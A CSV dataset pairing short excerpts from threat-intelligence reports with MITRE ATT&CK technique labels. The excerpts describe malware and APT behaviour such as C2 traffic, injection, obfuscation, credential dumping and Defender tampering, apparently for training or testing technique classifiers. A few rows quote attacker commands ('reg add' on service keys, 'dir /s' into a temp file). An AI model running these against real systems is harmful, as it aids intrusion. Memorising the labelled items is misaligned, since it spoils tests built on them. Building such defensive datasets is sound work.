text,label
"High Commissioner of Bangladesh Pakistan eying Sukhoi-35 fighter planes as part of defense deal from Russia 2018.143 PG COURSE IN 2018-2021 BATCH India Bangladesh and Pakistan Press Release on Observance of Historic Mujibnogor Dibosh by Pakistan Mission on 17 April 2018 Afghan Bomb Blast report by ISI USAJOBS Daily Saved Search Results for New GS15 for 3/30/2018 How Rigging take place in Senate Elections in Pakistan Afghan Terrorist group details ISI Restricted113 1971 Liberation War Freedom Fighters in Pakistan Army Custody Database  Additionally, the following filenames were witnessed in these attacks (spelling and grammar mistakes included):  Liberation Freedom Fighter.xlam NSC details of participants.xlam Raw Sect Vikram report on Pak Army Confidential.doc USA Immagration Policy for Families.ppam doc CV FM.doc doc Sukhoi35 deal report.doc Nominal Roll.doc Press Release 17 April.doc Afghan Blast report by ISI.doc Rigging in Pakistan Senate.doc Afghan Terrorist group report.doc    The payloads for these attacks varied in malware family",T1083
 TeamViewer ,T1219
The code is obfuscated in order to hide any malicious activity on the remote server,T1027
malware can take a screenshot and upload the file to its C2 server.,T1113
"reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost""",T1112
can download additional modules from C2.,T1105
can store captured system information locally prior to exfiltration.,T1074.001
can disarm Windows Defender during the UAC process to evade detection.,T1562.001
These were either dropped directly via the webshell or downloaded from a remote server,T1105
can download remote files onto victims.,T1105
has used keylogging tools in their operations.,T1056.001
can stage collected information including screen captures and logged keystrokes locally.,T1074.001
can decrypt its encrypted internal code.,T1140
can use HTTP communications for C2 as well as using the WinHTTP library to make requests to the Exchange Web Services API.,T1071.001
searches and reads the value of the Windows Update Registry Run key.,T1012
"These functions are made to steal credentials from different types of applications and services on the Windows operating system:
Browsers: Safari, Internet Explorer, Firefox and Chromium-based browsers",T1552.001
The threat actor executed two actions to bypass Windows Defender,T1562.001
Downloaded VBScript and PowerShell,T1105
seemingly legitimate executables and their respective sideloaded files,T1574.002
can retrieve system information including OS version memory usage local hostname and system adapter information.,T1082
"When opened, the OneNote document instructed the recipient to ""open"" the document by double-clicking the button displayed in the OneNote document.",T1204.002
modules spread the malware laterally across a network by abusing the SMB Protocol.,T1570
can collect data and files from a compromised host.,T1005
malware IndiaIndia obtains and sends to its C2 server information about the first network interface cards configuration including IP address gateways subnet mask DHCP information and whether WINS is available.(Citation: Novetta Blockbuster),T1016
its installation as a service was used in order to persist and create a backdoor to the network.,T1543.003
sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.,T1566.001
malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames which center around permutations of the username Administrator and weak passwords.(Citation: Novetta Blockbuster),T1110
It also drops and installs,T1105
can collect data from user directories.,T1005
can communicate over HTTP for C2.,T1071.001
"In doing so, it will attempt to detect the following Anti-Virus products via various techniques:  Trend Micro Kaspersky Symantec Avira AVG ALYac Ahnlab  Ahnlab and ALYac are the most widely used Anti-Virus solutions in South Korea, and Trend Micro and the rest are also known to be most widely used in Taiwan",T1518.001
During  the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script which revealed a small script designed to obtain an additional payload.,T1140
the attacker leveraging Windows Remote Desktop Connections to pivot to additional systems in the environment.,T1021.001
has used a small dictionary of common passwords against a collected list of local accounts.,T1110
attempted to use RDP to move laterally.,T1021.001
can copy files and Registry data from compromised hosts.,T1005
has used process hollowing to inject itself into legitimate Windows process.(Citation: Infoblox Lokibot January 2019) ,T1055
uses Run keys for persistence of its loader,T1547.001
the DLL was injected into the memory of the svchost.exe process,T1055
used the ipconfig /all command to gather the IP address from the system.,T1016
drop batch files,T1059.003
After escalating privileges  calls TerminateProcess() CreateRemoteThread and other Win32 APIs.,T1106
Domain fronting can be achieved with a redirect between the malicious server and the target.,T1090
"checks for a few installed and active antivirus products, namely:
Windows Defender
ESET",T1518.001
searches for certain Registry keys to be configured before executing the payload.,T1012
checks the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings for proxy configurations information.,T1012
is obfuscated using the open source ConfuserEx protector.  also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.,T1027
The decrypted payload,T1140
can download additional payloads from C2.(Citation: CISA SoreFang July 2016),T1105
can search a compromised host for specific files.,T1083
This could cause the file to run when double-clicked instead of opening it with a PDF viewer.,T1204.002
has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.,T1021.001
"domain name, Hostname and OS Version",T1082
C:\Windows\System32\rundll32.exe,T1218.011
along with code that decodes and decrypts the block of base64.,T1140
"stops specific defensive services (Windows Defender, etc)",T1562.001
using a domain service account.,T1078
can retrieve IP network adapter configuration information and domain from compromised hosts.(Citation: FireEye MuddyWater Mar 2018),T1016
If running as administrator  installs itself as a new service named bmwappushservice to establish persistence.,T1543.003
contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.,T1027
A module in  collects information from the victim about its IP addresses and MAC addresses.,T1016
can bypass UAC to elevate process privileges on a compromised host.,T1548.002
has the capability to delete files.,T1070.004
To establish persistence  identifies the Start Menu Startup directory and drops a link to its own executable disguised as an Office Start Yahoo Talk MSN Gaming Z0ne or MSN Talk shortcut.,T1547.001
has sent spearphishing attachments attempting to get a user to click.(Citation: Proofpoint Leviathan Oct 2017),T1204.002
The Decryption shellcode,T1140
Figure 3 – A list of file extensions targeted for destruction by new variant of KillDisk component As well as being able to delete system files to make the system unbootable – functionality typical for such destructive trojans – the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems,T1083
Sending back the result of the command’s execution to the C2 server.,T1041
moved laterally via RDP.(Citation: US-CERT TA18-074A),T1021.001
"We were able to brute force the actor-provided key using the inverse arithmetic operations using the embedded salt and embedded ciphertext, so we were able to extract the embedded webshells with ease",T1110
"When we converted the dates in the file strings from the Solar Hijri calendar to the Gregorian one, we found that they were close to the compilation times of the executables and also close to when Cadelle’s targets were initially compromised",T1027
"To prevent being detected, the attackers end processes and services related to security and antivirus software.",T1562.001
Powershell will be invoked and it fetch the Qakbot payload from Internet,T1105
dynamic API resolution,T1027
has used .cmd scripts on the victim's system. ,T1059.003
Most PowerShell scripts involved in LockBit 2.0 cases are Base64 encoded.,T1027
decrypts the configuration data using XOR with 25-character keys.,T1140
"obtains various system information including OS version, computer name and RAM size.",T1082
Uses EnumDeviceDrivers and GetDeviceDriverBaseNameA APIs.,T1106
has cleaned up all files associated with the secondary payload execution.,T1070.004
"The malware then proceeds to decrypt its configuration block,",T1140
has checked for the existence of a Service key to determine if it has already been installed on the system.,T1012
has the ability to use WMI to delete volume shadow copies.,T1047
can list the processes on the victims machine.,T1057
an encrypted payload,T1027
beacon payload can collect information on process details.,T1057
were initiated from the rundll32.exe process,T1218.011
collects a list of files and directories in C:\ with the command dir /s /a c:\ >> C:\windows\TEMP\[RANDOM].tmp.,T1083
RPC backdoors can upload files from victim machines.,T1005
can collect the username from the system. ,T1033
has used administrative accounts including Domain Admin to move laterally within a victim network.,T1078
Write text to a given *.bat file and execute it,T1059.003
has used a custom base64 alphabet to decode files.,T1027
has searched for specific files prior to encryption.,T1083
may be abused by adversaries to transfer tools or files between systems within a compromised environment.(Citation: Microsoft FTP),T1570
can decrypt and parse instructions sent from C2.,T1140
uses Base64 encoding for strings.,T1027
has used various strains of malware to query the Registry.,T1012
has been known to self-propagate via SMB.,T1570
"This IP is of particular interest as historical domain resolutions of this IP revealed that it had resolved to the domain hotmai1l[.]com in the past as well, which was a domain we had previously identified as having a high likelihood of association with DarkHydrus infrastructure",T1016
can encrypt and encode its configuration file.,T1027
"collects system information and browser history, then sends it to the C2 server.",T1041
can gather extended system information including the hostname OS version number platform memory information time elapsed since system startup and CPU information.(Citation: PWC Cloud Hopper Technical Annex April 2017),T1082
"Process access to LSASS was observed, likely to dump credentials",T1003.001
has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020),T1090
has collected files and data from a compromised host.,T1005
has used a program named ff.exe to search for specific documents on compromised hosts.,T1083
can use pre-configured HTTP proxies.,T1090
can execute via rundll32.,T1218.011
can collect information about the drives available on the system. ,T1082
shellcode decompressing and loading,T1140
rundll32.exe,T1218.011
use of W4SP crew obfuscation tools such as Hyperion and Kramer,T1027
Fernet is a symmetric encryption algorithm and token format used for secure communication and data protection,T1573.001
Usage of WMI for remote command execution,T1047
command and control occurs via HTTPS over port 443.,T1071.001
dispatcher can be executed as a service.,T1569.002
"uses a custom network protocol, which can function over HTTP",T1071.001
exploiting vulnerable web-facing devices,T1190
HackTool.Win32.CCPASS is another tool that is also used for Windows 10 UAC bypass,T1548.002
brute-forced devices,T1110
uses HTTP for C2 communications.,T1071.001
collects the victim's IP address.,T1016
informationAddSecurityPackage64.dll injects pc.dll into LSASS by deploying pc.dll as a Security Package,T1055
can gather extended system information such as information about the operating system disks and memory.(Citation: PWC KeyBoys Feb 2017),T1082
 can upload files matching a hardcoded set of extensions such as .doc .docx .pdf and .rar to its C2 server.,T1041
a legitimate tool which is frequently used by bad actors for malicious purposes in ways similar to TeamViewer,T1219
can obtain information about the victim's IP address.,T1016
creates two different scheduled tasks.,T1053.005
can brute force supplied user credentials across a network range.,T1110
"A total of 64MB of garbage data is appended to this copied file, likely as a way to deter any security products in place that may be scanning files on disk",T1027
"the threat actors conducted further discovery tasks running find.bat and p.bat,",T1059.003
executes these files through WMIC.,T1047
It then picks one random C&C URL out of the three available and constructs a GET request,T1071.001
has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.,T1016
The DLL’s used were side-loaded in memory on compromised systems.,T1574.002
attack of a Remote Desktop Protocol on a public-facing server.,T1190
can use HTTPS in C2 communications.(Citation: SentinelOne Lazarus macOS July 2020),T1071.001
is capable of spawning a reverse shell on a victim.,T1059.003
executes a Python script to download its second stage.,T1105
extracted files from compromised networks. ,T1005
“Display information about current Windows version,T1082
has utilized a UAC bypass tool.,T1548.002
uses basic obfuscation in the form of spaghetti code.(Citation: Symantec Elderwood Sept 2012),T1027
recursively searches through directories for files.,T1083
has downloaded additional Lua scripts from the C2.,T1105
uses ipconfig to gather the IP address from the system.,T1016
has relied on injecting its payload directly into the process memory of the victim's preferred browser.,T1055
has used multiple types of encryption and encoding for their payloads including AES Caracachs RC4 XOR Base64 and other tricks such as creating aliases in code for  function names.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: TrendMicro macOS Dacls May 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)(Citation: ClearSky Lazarus Aug 2020)(Citation: Lazarus APT January 2022),T1027
It is unpacked,T1027
has attempted to hide its payload by using legitimate file names such as iconcache.db.,T1036.005
used Rundll32 to execute payloads. ,T1218.011
downloading and executing,T1105
can download and execute files to further infect a host machine with additional malware.,T1105
"The following code snippet was used to decode strings within OopsIE:out = """" for e in obfuscated_string.split(""-""):    out += chr(int(e)-1)When first run, this OopsIE variant runs a variety of checks to avoid running in an analysis environment, as discussed in the previous section",T1140
runs rundll32.exe to load the malware.,T1218.011
Logfiles on the Linux-system show traces which can be attributed to a credential stuffing or password spraying attack.,T1110
has executed HTA files via cmd.exe and used batch scripts for collection.(Citation: Anomali MUSTANG PANDA October 2019),T1059.003
A version of  introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.,T1027
the injected code,T1055
This activity group always uses a renamed version of rar.exe.,T1036.005
Enumerates files under Steam application directory,T1083
packed some payloads using different types of packers both known and custom.,T1027
Packed Rorschach loader and injector,T1027
can enumerate the process it is currently running under.,T1057
Encrypted and compressed payload,T1027
exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.,T1190
can collect and send OS version and computer name as a part of its C2 beacon.,T1082
the adversary accessed the company portal with the valid account.,T1078
can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine.  can also halt execution if the compromised host is identified as a domain controller.(Citation: Cisco CaddyWiper March 2022),T1082
the different processes they injected into,T1055
has the ability to search for a given process name in processes currently running in the system.,T1057
s infpub.dat file uses NTLM login credentials to brute force Windows machines.,T1110
"Table 4: URL parameters Additionally, the command string is hashed using the same RGPH hashing algorithm as before",T1016
can use HTTP for C2 communications.,T1071.001
dropped and executed on the server,T1105
ran a reverse shell with Meterpreter.(Citation: Cymmetria Patchwork)  used JavaScript code and .SCT files on victim machines.(Citation: TrendMicro Patchwork Dec 2017),T1059.003
Some  samples use cmd.exe to delete temporary files.,T1070.004
has used  to obtain credentials.,T1003.001
"Information such as operating system architecture, framework version, operating system version, etc.",T1082
cmd.exe /C hostname,T1082
the JPEG decoy file,T1027
Windows Defender tampering,T1562.001
can connect to remote shares using `WNetAddConnection2W`.,T1106
to report some basic information about the compromised system,T1005
attempts to disable UAC remote restrictions by modifying the Registry.,T1548.002
using an obfuscated Meterpreter stager,T1027
The PowerShell script decoded from the Ir8 variable uses Reflection.,T1140
can enumerate all running processes and process information on an infected machine.,T1057
One of the main initial access vector is exploitation of publicly exposed web services.,T1190
the actors gained access to a VMware service account with administrator and system level access,T1078
looks for processes from a hard-coded list.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020),T1057
has the ability to upload exfiltrated files to a C2 server.,T1041
has collected the victim host information after infection.,T1082
"A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary shell command execution.",T1105
perform process injection to masquerade as harmless processes.,T1055
"reg  add ""HKLM\SYSTEM\CurrentControlSet\Services\iscsiwmi\Parameters"" /",T1112
attachments have been delivered via compressed archive files.  also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.,T1027
gathers the victim username.,T1033
has a command to launch a keylogger and capture keystrokes on the victims machine.(Citation: Fortinet Metamorfo Feb 2020) ,T1056.001
"In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium",T1566.001
has used compromised domain accounts to gain access to the target environment.,T1078
injects DLL files into iexplore.exe.(Citation: Lotus Blossom Jun 2015),T1055
This campaign began with thread hijacked emails which contained HTML attachments.,T1566.001
has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.,T1059.003
can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019),T1071.001
"the process imbedded itself into wermgr.exe, the Windows Error Reporting Manager (Process ID 6660).",T1055
"To limit the disk space used, images where fewer than 5% of the pixels differ from the most recently stored capture aren’t saved.",T1113
sets a WH_CBT Windows hook to search for and capture files on the victim.,T1083
CreateFile and WriteFile are used,T1106
has used `cmd` to execute commands on a compromised host.,T1059.003
can be used to download or upload a file over a network share.,T1570
has used tracert to check internet connectivity.,T1016
"The malware then de-XORs other strings, with the hard-coded key",T1140
"acquired through the use of Mimikatz, or creating LSASS dumps,",T1003.001
has deleted and overwrote files to cover tracks.(Citation: Unit 42 Magic Hound Feb 2017),T1070.004
has injected an install module into a newly created process.,T1055
Decrypted OwaAuth log file format,T1140
can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019),T1036.005
can use HTTP in C2 communications.(Citation: CISA SoreFang July 2016),T1071.001
has downloaded and executed additional plugins.,T1105
has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically.,T1543.003
has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020),T1204.002
sample uses obfuscation,T1027
has used  to harvest credentials from the victim's machine.,T1003.001
spawns a new copy of c:\windows\syswow64\explorer.exe and then replaces the executable code in memory with malware.(Citation: Malwarebytes SmokeLoader 2016),T1055
capturing screenshots,T1113
Figure 4: Downloading second stage Seminar.rtf The downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via Equation Editor executable,T1105
has used HTTP POST requests for C2 communications.,T1071.001
can download additional malware plug-in modules and execute them on the victims machine.,T1105
can browse file systems.(Citation: Kaspersky Adwind Feb 2016),T1083
can create a link to itself in the Startup folder to automatically start itself upon system restart.(Citation: Symantec Dragonfly),T1547.001
malware hidden inside the Python compiled byte code,T1027
used shellcode with an XOR algorithm to decrypt a payload.  also decrypted image files which contained a payload.(Citation: Unit 42 Tropic Trooper Nov 2016),T1140
These discovery actions were completed several times again in other various batch files.,T1059.003
This process was invoked by RunDLL32.exe,T1218.011
Analysis APT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization,T1566.001
malware has created scheduled tasks to establish persistence.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FireEye FIN7 Aug 2018),T1053.005
has established persistence via the `HKCU\SOFTWARE\microsoft\windows\currentversion\run` registry key.,T1547.001
can query the Registry to get random file extensions to append to encrypted files.,T1012
has a component to check for running processes to look for web browsers. ,T1057
Heavily obfuscated PowerShell script,T1027
files are distributed and stored in encrypted form.,T1027
creates a backdoor through which remote attackers can upload files.,T1105
"It is capable of the following functions:  Collect file/folder/drive information Download files and additional malware Launch/terminate/enumerate process Update configuration data Delete files Inject code from files to other running process Utilize proxy Open reverse shell Run in passive mode — instead of actively connecting to the command and control (C&C) server, the backdoor will open and listen to a port then receive commands through it  Once the backdoor is loaded, it will then load the encrypted configuration file Auditcred.dll.mui/rOptimizer.dll.mui to extract the C&C information and connect to it",T1055
has attempted to terminate/stop processes and services associated with endpoint security products.,T1562.001
The username appears to be attacker specified and has occurred in 2017 Bankshot samples,T1033
can query the Registry for its configuration information.,T1012
submitted to the C2 server through HTTP protocol using the POST method.,T1071.001
can use DLL side-loading to load malicious DLLs.,T1574.002
has the ability to capture screenshots on compromised hosts.,T1113
"In the event it does, Reaver will move this file to ‘%TEMP%\~FJIOW.tmp’ and delete this new file",T1070.004
can download remote files.(Citation: Trend Micro Daserf Nov 2017),T1105
we can see decryption of the next stage with the help of a custom algorithm,T1140
After the writing in the registry has been completed,T1112
This first lateral movement was performed in order to drop and install AnyDesk.,T1570
can collect files from local drives.,T1005
API call attempts to processes:,T1106
captures screenshots of the victims screen.,T1113
can delete files and folders from compromised machines.,T1070.004
can create a scheduled task for persistence.,T1053.005
can use default credentials to connect to IPC$ shares on remote machines.,T1078
has registered itself as a system service in the Registry for automatic execution at system startup.,T1543.003
has used fragmented strings environment variables standard input (stdin) and native character-replacement functionalities to obfuscate commands.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye FIN7 Aug 2018),T1027
has used HTTP for C2 communications.,T1071.001
searches for specific directories on the victims machine.,T1083
